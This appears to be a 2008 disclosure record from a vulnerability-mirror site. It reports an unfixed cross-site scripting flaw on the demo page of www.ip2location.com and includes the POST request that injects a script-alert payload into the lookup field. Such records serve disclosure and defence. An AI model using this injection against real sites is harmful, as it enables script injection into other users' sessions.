Security researcher RoMeO submitted a cross-site scripting (XSS) vulnerability affecting www.ip2location.com on 14/02/2008; at the time of submission the site ranked 14646 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 14/02/2008
Date published: 06/04/2008
Status: UNFIXED
Author: RoMeO
Domain: www.ip2location.com
Category: XSS
Pagerank: 14646
URL: http://www.ip2location.com/demo.aspx
POST: __VIEWSTATE=[...]&txtLookup=%3A+%3Cscript%3Ealert%281%29%3C%2Fscript%3E&btnFindLocation.x=35&btnFindLocation.y=16&ipaddresses=